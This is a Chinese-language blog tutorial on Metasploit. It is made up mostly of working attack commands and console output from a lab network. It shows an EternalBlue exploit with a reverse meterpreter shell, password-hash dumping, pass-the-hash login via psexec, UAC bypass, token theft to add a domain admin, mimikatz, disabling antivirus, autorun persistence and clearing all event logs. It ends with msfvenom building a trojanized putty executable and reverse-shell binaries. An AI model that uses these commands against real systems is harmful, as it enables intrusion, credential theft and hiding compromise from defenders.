metasploit续

信息收集

1域名、dns信息收集
1)whois查询

whois 域名|ip

2)nslookup

nslookup 域名

2.nmap
1)隐秘的tcp扫描和不ping。

nmap -sS -Pn ip

2)Tcp空闲扫描
window上运行metasploit,线程数最好不要超过16,UXNIX平台上不要超过128

msf > use auxiliary/scanner/ip/ipidseq 
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ipidseq) > set threads 60
threads => 60
msf auxiliary(ipidseq) > run

发现空闲主机192.168.2.5可用于空闲扫描,对目标机进行扫描

msf auxiliary(ipidseq) >nmap -PN -sI 192.168.2.5 192.168.2.8

3)msf中的db_nmap
4)查看metasploit的端口扫描工具

msf > search portscan

3.针对性扫描
1)服务器消息块协议扫描

msf > use auxiliary/scanner/smb/smb_version

2)搜寻配置不当的mssql

msf > use auxiliary/scanner/mssql/mssql_ping  
msf auxiliary(mssql_ping) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(mssql_ping) > set threads 255
threads => 255
msf auxiliary(mssql_ping) > run

3)ssh服务器扫描

msf>search ssh_version

4)FTP扫描

msf > use auxiliary/scanner/ftp/ftp_version   
msf auxiliary(ftp_version) > set threads 255
threads => 255
msf auxiliary(ftp_version) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ftp_version) > run

5)简单的网络管理

search snmp_login

漏洞扫描

1.nexpose

2.nessus
3.扫描开放的vnc空口令
最新版的vnc服务器不再允许使用空口令

msf > use  auxiliary/scanner/vnc/vnc_none_auth

4.扫描开放的x11服务器
x11在新的操作系统上不再使用的

msf > use auxiliary/scanner/x11/open_x11

2.利用扫描结果进行自动化攻击

利用autopwn自动攻击(不建议)

msf>db_connect postgres:toor@127.0.0.1/msf1
db_import /root/nessus.nbe
db_autopwn -e -t -r -x -p

渗透攻击

1.渗透攻击基础

msf中的命令

msf>?
Core Commands
=============

Command Description
------- -----------
? Help menu
advanced Displays advanced options for one or more modules
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
info Displays information about one or more modules
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
rename_job Rename a job
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers


Database Backend Commands
=========================

Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

可用的渗透攻击模块

msf>show exploits

可用的辅助模块

msf>show auxiliary

可用的攻击载荷

show payloads

2.永恒之蓝的利用
1)metasploit没有的集成的话去下载,或者更新到最新的。
ms17_010扫描模块的安装

root@kali:~/Desktop# cp smb_ms17_010.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/

漏洞利用脚本的安装
把模块下载到对应的目录(kali下metasploit存放模块的目录是/usr/share/metasploit-framework/modules/)

cd /usr/share/metasploit-framework/modules/exploits/windows/smb/ 

wget https://raw.githubusercontent.com/rapid7/metasploit-
framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

2)漏洞扫描
nmap针对漏洞脚本的定向扫描

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

或者使用smb_ms17_010

use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块
show option # 查看模块配置选项
set RHOST 192.168.1.1-254 # 配置扫描目标
set THREADS 30 #配置扫描线程
run #运行脚本

3)开始攻击

msf> use exploit/windows/smb/ms17_010_eternalblue # 调用ms17-010永恒之蓝漏洞攻击模块
msf exploit(windows/smb/ms17_010_eternalblue) > show targets #查看攻击的有效对象
msf exploit(windows/smb/ms17_010_eternalblue) > info #查看详细信息
msf exploit(ms17_010_eternalblue) > setg rhost 192.168.2.5 # 设定全局变量的攻击目标 192.168.2.5
rhost => 192.168.2.5
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # 调用反弹的攻击载荷
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.2.3 # 设定将meterpreter反弹给192.168.2.3
lhost => 192.168.2.3
msf exploit(ms17_010_eternalblue) > show options # 查询攻击参数设置

meterpreter

1.常见命令
基本命令:

background  # 让meterpreter处于后台模式  
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
irb # 开启ruby终端
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
kill pid # 杀死进程
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息,如机器名,操作系统等

shutdown # 关机

截屏

meterpreter>screenshot

系统运行的平台信息

meterpreter>sysinfo

查看进程和进程转移

ps       
migrate pid

查看权限

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

获取目标机器的工作目录和得到当前系统的工作目录

meterpreter > getwd  
C:\Windows\system32

meterpreter > getlwd
/root

上传文件到目标主机和下载目标文件

meterpreter > upload /root/1.txt c:\\
[*] uploading : /root/1.txt -> c:\
[*] uploaded : /root/1.txt -> c:\\1.txt

meterpreter > download c:/2.txt /root
[*] Downloading: c:/2.txt -> /root/2.txt
[*] Downloaded 5.00 B of 5.00 B (100.0%): c:/2.txt -> /root/2.txt
[*] download : c:/2.txt -> /root/2.txt

搜索目标主机上的文件

meterpreter > search -h 
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\\ -r flase -f *.txt
Found 2 results...
c:\1.txt (2 bytes)
c:\2.txt (5 bytes)

确定是不是虚拟机

meterpreter > run post/windows/gather/checkvm  

[*] Checking if WIN-VONVJ6OMEQ7 is a Virtual Machine .....
[+] This is a VMware Virtual Machine

开3389

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20180430181213_default_192.168.1.187_host.windows.cle_516653.txt
meterpreter > netstat -ano

Connection list
===============

Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 696/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1040/svchost.exe

远程主机的3389的端口映射到本机的1235号端口

meterpreter > portfwd add -l 1234 -r 192.168.1.187 -p 3389
[*] Local TCP relay created: :1234 <-> 192.168.1.187:3389

创建新进程cmd.exe,-H不可见,-i交互

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
meterpreter > excte -H -f cmd.exe
[-] Unknown command: excte.
meterpreter > execute -H -f cmd.exe
Process 1840 created.

2.获取密码哈希值
aad3b435开头的哈希值是一个空的或者不存在的哈希值–空字符串的占位符

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

3.用得到的管理员的用户哈希值登录

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(windows/smb/psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.1.130
lhost => 192.168.1.130
msf exploit(windows/smb/psexec) > set lpost 4333
lpost => 4333
msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
SMBPass => aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
msf exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.230:1444
[*] 192.168.1.187:445 - Connecting to the server...
[*] 192.168.1.187:445 - Authenticating to 192.168.1.187:445 as user 'Administrator'...
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (205891 bytes) to 192.168.1.187
[*] Meterpreter session 1 opened (192.168.1.230:1444 -> 192.168.1.187:49468) at 2018-04-30 18:48:56 -0400

meterpreter >

4.权限提升

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

bypassuac

meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/psexec) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
session => 1
msf exploit(windows/local/bypassuac) > exploit

5.令牌的假冒
1)incognito

meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-VONVJ6OMEQ7\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

2)ps 找到域管理员的pid参数(有时候不能看到)

meterpreter>ps 
meterpreter > steal_token pid号 #盗取域管理员用户的令牌

利用域管理员的令牌创建用户,并授予域管理员的权限
例子

meterpreter>impresonate_token SNEAKS.IN\\domianadmin
meterpreter>add_user qy qy -h 192.168.1.5 #-h是域管理员添加账号的地址
meterpreter>add_group_user "Doamin Admins" qy -h 192.168.1.5

6.通过跳板攻击其他主机

meterpreter > run get_local_subnets #查看本地子网

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0

meterpreter > background
[*] Backgrounding session 1...

msf exploit(windows/local/bypassuac) > route add 192.168.2.0 255.255.255.0 1 #告诉系统将远程ID通过攻击会话1来进行路由
[*] Route added
msf exploit(windows/local/bypassuac) > route print #显示当前活跃的路由信息

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
192.168.2.0 255.255.255.0 Session 1

7.获取系统管理员的密码

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-VONVJ6OMEQ7$
0;46406 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP WIN-VONVJ6OMEQ7$

8.脚本的使用
1).vnc

meterpreter > run vnc #在远程系统上安装vnc会话
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.230 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\jzoEGmzImp.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.230:4545...

meterpreter > run screen_unlock # 对目标机器上的桌面进行解锁
[!] Meterpreter scripts are deprecated. Try post/windows/escalate/screen_unlock.
[!] Example: run post/windows/escalate/screen_unlock OPTION=value [...]
[*] no working target found

2).查看系统安装的软件

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-VONVJ6OMEQ7

Installed Applications
======================

Name Version
---- -------
2345好压 v5.9
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 14.0.24215.1
Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 14.0.24215
Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 14.0.24215
Python 2.7.13 (64-bit) 2.7.13150
VMware Tools 10.2.0.7259539


[+] Results stored in: /root/.msf4/loot/20180501054603_default_192.168.1.187_host.application_930049.txt

3)迁移到稳定的进程

meterpreter > getpid
Current pid: 1128

meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-VONVJ6OMEQ7
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3592
[+] Successfully migrated to process 3592

meterpreter > getpid
Current pid: 3592

4)关闭杀毒软件

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...

5)查看目标机上的所有来流量

meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-VONVJ6OMEQ7_20180501.0138/WIN-VONVJ6OMEQ7_20180501.0138.cap
[*] Packet capture interval is 30 Seconds

5)得到目标主机系统用户的哈希值

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

6)得到详细的系统信息
用户名和密码、下载全部注册表、挖掘密码哈希值和收集系统信息

meterpreter > run scraper
[*] New session on 192.168.1.187:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\JKaHEoEs.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\qCMsnidu.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\PTbboPFX.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\AQMWnvZo.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\XNLnHUgE.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.1.187:445...

7)控制持久化
-X 开机自启动,-i 40每40秒重连一次 -p指定端口

meterpreter > run persistence -X -i 40 -p 443 -r 192.168.1.187 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-VONVJ6OMEQ7_20180501.2631/WIN-VONVJ6OMEQ7_20180501.2631.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=443
[*] Persistent agent script is 99671 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ManzZNr.vbs
[*] Executing script C:\Windows\TEMP\ManzZNr.vbs
[+] Agent executed with PID 3852
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa

开始连接

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.187
lhost => 192.168.1.187
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > exploit

8)列出所有后渗透模块
run post/ 后,按tab见

meterpreter > run post/
Display all 207 possibilities? (y or n)

9.Railgun组件操作windows API

meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

结果如下图

10.将shell提升为meterpreter

C:\Windows\system32> # ctrl+z 把会话放在后台 
Background session 1? [y/N] y
msf exploit(windows/smb/ms17_010_eternalblue) > sessions -i

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [_ 6.1.7601] _ (c) 2009 Microsoft Corporation_ C:\Windows\s... 192.168.1.230:4411 -> 192.168.1.187:54038 (192.168.1.187)

msf exploit(windows/smb/ms17_010_eternalblue) > sessions -u 1 #升级为meterpreter

11.隐藏踪迹
清除了所有日志,容易被发现。

meterpreter > run event_manager
Meterpreter Script for Windows Event Log Query and Clear.

OPTIONS:

-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to save logs

meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] HardwareEvents:
[*] Clearing HardwareEvents
[*] Event Log HardwareEvents Cleared!
[*] Internet Explorer:
[*] Clearing Internet Explorer
[*] Event Log Internet Explorer Cleared!
[*] Key Management Service:
[*] Clearing Key Management Service
[*] Event Log Key Management Service Cleared!
[*] Security:
[*] Clearing Security
[*] Event Log Security Cleared!
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics:
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
[*] Windows PowerShell:
[*] Clearing Windows PowerShell
[*] Event Log Windows PowerShell Cleared!

msfvenom

msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom
1.常识
参数含义:

root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
--help-platforms List available platforms
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message

1)查看payload

root@kali:~#  msfvenom -l payloads


Framework Payloads (507 total)
==============================

Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
……

2)查看编码方法

root@kali:~#  msfvenom -l encoders

Framework Encoders
==================

Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

exclent级别

cmd/powershell_base64  
x86/shikata_ga_nai

3)查看nops选项(空字段模块,为了绕过和免杀)


root@kali:~# msfvenom -l nops

Framework NOPs (10 total)
=========================

Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator

4)可支持的平台


root@kali:~# msfvenom --help-platforms
Platforms
aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unix, windows

5)可生成的格式

root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

6)查payload选项

    ----  ---------------  --------  -----------
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp --payload-options
Options for payload/windows/x64/meterpreter/reverse_tcp:


Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/meterpreter/reverse_tcp
Platform: Windows
Arch: x64 #是指生成的payload只能在64位系统运行
Needs Admin: No
Total size: 449
Rank: Normal

Provided by:
skape <mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
OJ Reeves

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Description:
Inject the meterpreter server DLL via the Reflective Dll Injection
payload (staged x64). Connect back to the attacker (Windows x64)


Advanced options for payload/windows/x64/meterpreter/reverse_tcp:

Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.

2.生成payload
1)将payload注入到putty中(会被360杀掉)

root@kali:~# msfvenom -p windows/xmeterpreter/reverse_tcp LHOST=192.168.1.230 LPORT=4443 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/putty.exe -k -f exe -o /root/Desktop/putty_evil.exe
Skipping invalid encoder x64/shikata_ga_nai
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 867840 bytes
Saved as: /root/Desktop/putty_evil.exe

2)windows x64(被杀)

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.230 LPORT=4441 -f exe > shell.exe

3)linux

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.230  LPORT=4441 -f elf > shell.elf

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器